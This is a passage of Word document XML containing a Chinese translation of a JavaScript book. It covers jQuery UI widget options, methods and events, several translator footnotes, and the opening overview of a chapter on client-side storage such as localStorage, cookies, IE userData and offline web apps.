        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要想灵活自如地使用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery UI</w:t>
      </w:r>
      <w:r>
        <w:t>组件，需要熟悉三件东西：它的配置选项、它的方法以及它的事件。所有</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery UI</w:t>
      </w:r>
      <w:r>
        <w:t>组件都是可配置的，有一些组件有很多配置选项。可以通过给组件方法传递选项对象（和在动画操作里，传递选项对象给</w:t>
      </w:r>
      <w:r>
        <w:t>animate()</w:t>
      </w:r>
      <w:r>
        <w:t>类似）来自定义组件的行为和外观。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery UI</w:t>
      </w:r>
      <w:r>
        <w:t>组件通常会定义至少有几个</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>来与组件交互。但是，为了避免</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>方法的迅速增多，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery UI</w:t>
      </w:r>
      <w:r>
        <w:t>组件不会将它们的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>定义成真正的方法。每个组件只会有一个方法（与上例中的</w:t>
      </w:r>
      <w:r>
        <w:t>datapicker()</w:t>
      </w:r>
      <w:r>
        <w:t>方法一样）。当需要调用组件的一个</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>时，需要给该组件定义的真正方法传递预期</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的名称。例如，想要禁用日期选取组件，不能调用</w:t>
      </w:r>
      <w:r>
        <w:t>disableDatapicker()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，而需要调用</w:t>
      </w:r>
      <w:r>
        <w:t>datepicker("disable")</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery UI</w:t>
      </w:r>
      <w:r>
        <w:t>组件通常会定义自定义事件，响应用户交互</w:t>
      </w:r>
      <w:r>
        <w:t>时触发它们。可以使用常用的</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来给这些自定义事件绑定事件处理程序，通常还可以将事件处理程序函数作为选项对象的属性，该选项对象会传递给组件方法。事件处理程序的第一个参数依旧是</w:t>
      </w:r>
      <w:r>
        <w:t>Ev</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ent</w:t>
      </w:r>
      <w:r>
        <w:t>对象。某些组件还会传递一个</w:t>
      </w:r>
      <w:r>
        <w:t>"UI"</w:t>
      </w:r>
      <w:r>
        <w:t>对象作为事件处理程序的第二个参数。该对象通常提供了当前组件的状态信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery UI</w:t>
      </w:r>
      <w:r>
        <w:t>文档中有时描述的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>并不是真正的自定义事件，可能描述为回调函数会更好，这些回调函数是通过配置选项对象设置的。例如，日期选取组件支持不少回调函数，可以在不同的时间点调用它。但是，这些函数</w:t>
      </w:r>
      <w:r>
        <w:t>中没有一个拥有标准的事件处理程序签名，不能使用</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>来为这些</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>注册处理程序。正确的做法是，在初始调用</w:t>
      </w:r>
      <w:r>
        <w:t>datapicker()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，给组件传递配置选项时，就指定合适的回调函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>本书不涵盖</w:t>
      </w:r>
      <w:r>
        <w:t>Prototype</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>YUI</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>dojo</w:t>
      </w:r>
      <w:r>
        <w:t>等其他通用类库。搜索</w:t>
      </w:r>
      <w:r>
        <w:t>"JavaScript libraries"</w:t>
      </w:r>
      <w:r>
        <w:t>可以找到更多类库。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>如果你在自己的代码中有使用</w:t>
      </w:r>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t>作为变量，或者引入了</w:t>
      </w:r>
      <w:r>
        <w:t>Prototype</w:t>
      </w:r>
      <w:r>
        <w:t>等使用</w:t>
      </w:r>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t>作为全局变量的类库，这时，为了避免冲突，可以调用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.noConflict()</w:t>
      </w:r>
      <w:r>
        <w:t>来释放</w:t>
      </w:r>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t>变量，让其指</w:t>
      </w:r>
      <w:r>
        <w:t>向原始值。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>在撰写本章时，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的最新版本是</w:t>
      </w:r>
      <w:r>
        <w:t>1.4.2</w:t>
      </w:r>
      <w:r>
        <w:t>。在本书准备出版时，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>刚发布</w:t>
      </w:r>
      <w:r>
        <w:t>1.5</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>1.5</w:t>
      </w:r>
      <w:r>
        <w:t>版本最大的变化是</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>工具函数，这将在</w:t>
      </w:r>
      <w:r>
        <w:t>19.6</w:t>
      </w:r>
      <w:r>
        <w:t>节提及。在本书翻译成中文时，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>已发布</w:t>
      </w:r>
      <w:r>
        <w:t>1.6.2</w:t>
      </w:r>
      <w:r>
        <w:t>版本，不过万物归宗，学会</w:t>
      </w:r>
      <w:r>
        <w:t>1.4.2</w:t>
      </w:r>
      <w:r>
        <w:t>版本如何使用，跟进</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的最新版本，都是很简单的事情了。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>textColor</w:t>
      </w:r>
      <w:r>
        <w:t>不对，应该是</w:t>
      </w:r>
      <w:r>
        <w:t>color</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>使用术语</w:t>
      </w:r>
      <w:r>
        <w:t>"bind"</w:t>
      </w:r>
      <w:r>
        <w:t>来表示事件处理程序的注册。</w:t>
      </w:r>
      <w:r>
        <w:t>ECMA Script 5</w:t>
      </w:r>
      <w:r>
        <w:t>（以及不少</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>框架）给函数定义</w:t>
      </w:r>
      <w:r>
        <w:t>了</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法（参见</w:t>
      </w:r>
      <w:r>
        <w:t>8.7.4</w:t>
      </w:r>
      <w:r>
        <w:t>节），使用</w:t>
      </w:r>
      <w:r>
        <w:t>"bind"</w:t>
      </w:r>
      <w:r>
        <w:t>术语来表示对象与函数之间的关联，这些函数会在这些对象上调用。</w:t>
      </w:r>
      <w:r>
        <w:t>Function.bind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>版本是一个名为</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.proxy()</w:t>
      </w:r>
      <w:r>
        <w:t>的工具函数，在</w:t>
      </w:r>
      <w:r>
        <w:t>19.7</w:t>
      </w:r>
      <w:r>
        <w:t>节中会讲解它。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的实现方式不支持非数值动画，但有其他实现方案，比如传入自定义的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性变化函数。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:bookmarkStart w:id="502" w:name="_7_"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="502"/>
      <w:r>
        <w:t>在最新版本的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>里，已优化了实现，采用</w:t>
      </w:r>
      <w:r>
        <w:t>eval</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>execScript</w:t>
      </w:r>
      <w:r>
        <w:t>来执行。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:bookmarkStart w:id="503" w:name="_8_"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[8]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="503"/>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>插件的这种扩展方式是全局性的，带来方便的同时，也污染了</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象，容易造成潜在的冲突。译者并不推荐</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>随时想着</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>使用这种扩展方式。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="504" w:name="Di_20Zhang__Ke_Hu_Duan_Cun_Chu_____WebYi"/>
      <w:bookmarkStart w:id="505" w:name="Di_20Zhang__Ke_Hu_Duan_Cun_Chu_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:t>章　客户端存储</w:t>
      </w:r>
      <w:bookmarkEnd w:id="504"/>
      <w:bookmarkEnd w:id="505"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用允许使用浏览器提供的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>实现将数据存储到用户的电脑上。这种客户端存储相当于赋予了</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器记忆功能。比方说，</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用就可以用这种方式来</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>记住</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>用户的偏好甚至是用户所有的状态信息，以便准确地</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>回忆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>起用户上一次访问的位置。客户端存储遵循</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>同源策略</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，因此不同站点的页面是无法互相读取对方存储的数据，而同一站点的不同页面之间是可</w:t>
      </w:r>
      <w:r>
        <w:t>以互相共享存储数据的，它为我们提供了一种通信机制，例如，一个页面上填写的表单数据可以显示在另外一个页面中。</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用可以选择它们存储数据的有效期：比如采用临时存储可以让数据保存至当前窗口关闭或者浏览器退出；采用永久存储，可以将数据永久地存储到硬盘上，数年或者数月不失效。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>客户端存储有以下几种形式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>存储</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>存储最初作为</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>的一部分被定义成</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>形式，但是后来被剥离出来作为独立的一份标准了。该标准目前还在草案阶段，但其中一部分内容已经被包括</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>在内的所有主流浏览器（可交互地）实现了。</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>存</w:t>
      </w:r>
      <w:r>
        <w:t>储标准所描述的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>包含</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>对象和</w:t>
      </w:r>
      <w:r>
        <w:t>sessio</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>nStorage</w:t>
      </w:r>
      <w:r>
        <w:t>对象，这两个对象实际上是持久化关联数组，是名值对的映射表，</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>名</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>值</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>都是字符串。</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>存储易于使用、支持大容量（但非无限量）数据存储同时兼容当前所有主流浏览器，但是不兼容早期浏览器。</w:t>
      </w:r>
      <w:r>
        <w:t>20.1</w:t>
      </w:r>
      <w:r>
        <w:t>节会对</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>这两个对象作详细介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>是一种早期的客户端存储机制，起初是针对服务器端脚本设计使用的。尽管在客户端提供了非常繁琐的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript API</w:t>
      </w:r>
      <w:r>
        <w:t>来操作</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>ookie</w:t>
      </w:r>
      <w:r>
        <w:t>，但它们难用至极，而且只适合存储少量文本数据。不仅如此，任何以</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>形式存储的数据，不论服务器端是否需要，每一次</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求都会把这些数据传输到服务器端。</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>目前仍然被客户端程序员大量使用的一个重要原因是：所有新旧浏览器都支持它。但是，随着</w:t>
      </w:r>
      <w:r>
        <w:t>Web Storage</w:t>
      </w:r>
      <w:r>
        <w:t>的普及，</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>终将会回归到最初的形态：作为一种被服务端脚本使用的客户端存储机制。</w:t>
      </w:r>
      <w:r>
        <w:t>20.2</w:t>
      </w:r>
      <w:r>
        <w:t>节会详细介绍</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>IE User Data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>微软在</w:t>
      </w:r>
      <w:r>
        <w:t>IE5</w:t>
      </w:r>
      <w:r>
        <w:t>及之后的</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器中实现了它专属的客户端存储机制</w:t>
      </w:r>
      <w:r>
        <w:t>——"userDa</w:t>
      </w:r>
      <w:r>
        <w:t>ta"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>userData</w:t>
      </w:r>
      <w:r>
        <w:t>可以实现一定量的字符串数据存储，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>对于</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>以前的</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器中，可以将其用做是</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>存储的替代方案。关于</w:t>
      </w:r>
      <w:r>
        <w:t>userData</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>会在</w:t>
      </w:r>
      <w:r>
        <w:t>20.3</w:t>
      </w:r>
      <w:r>
        <w:t>节中进行相应介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>离线</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>标准中定义了一组</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>离线</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用</w:t>
      </w:r>
      <w:r>
        <w:t>”API</w:t>
      </w:r>
      <w:r>
        <w:t>，用以缓存</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面以及相关资源（脚本、</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>文件、图像等）。它实现的是将</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用整体存储在客户端，而不仅仅是存储数据。它能够让</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>在客户端，这样一来，哪怕网络不可用的时候</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用依然是可用的。离线</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用相关的内容会在</w:t>
      </w:r>
      <w:r>
        <w:t>20.4</w:t>
      </w:r>
      <w:r>
        <w:t>节中介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>We</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>数据库</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为了能够让开发者像使用数据库那样来操作大量数据，很多主流的浏览器纷纷在其中开始集成客户端数据库的功能。</w:t>
      </w:r>
      <w:r>
        <w:t>Safari</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Opera</w:t>
      </w:r>
      <w:r>
        <w:t>都内置了</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>数据库的客户端</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。遗憾的是，这类</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的标准化工作以失败告终，并且</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>看样子也都不打算实现这种</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。目前还有一种正在标准化的数据库</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>索引数据库</w:t>
      </w:r>
      <w:r>
        <w:t>API”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>Indexed Database API</w:t>
      </w:r>
      <w:r>
        <w:t>）。调用该</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>返回的是一个不包含查询语言的简单数据库对象。这两种客户端数据库</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>都是异步的，都使用了事件处理机制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>，这样的方式多多少少会显得有些</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>复杂。本章不会对它们做介绍，但是</w:t>
      </w:r>
      <w:r>
        <w:t>22.8</w:t>
      </w:r>
      <w:r>
        <w:t>节会简要介绍索引数据库</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>同时会提供一些例子。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
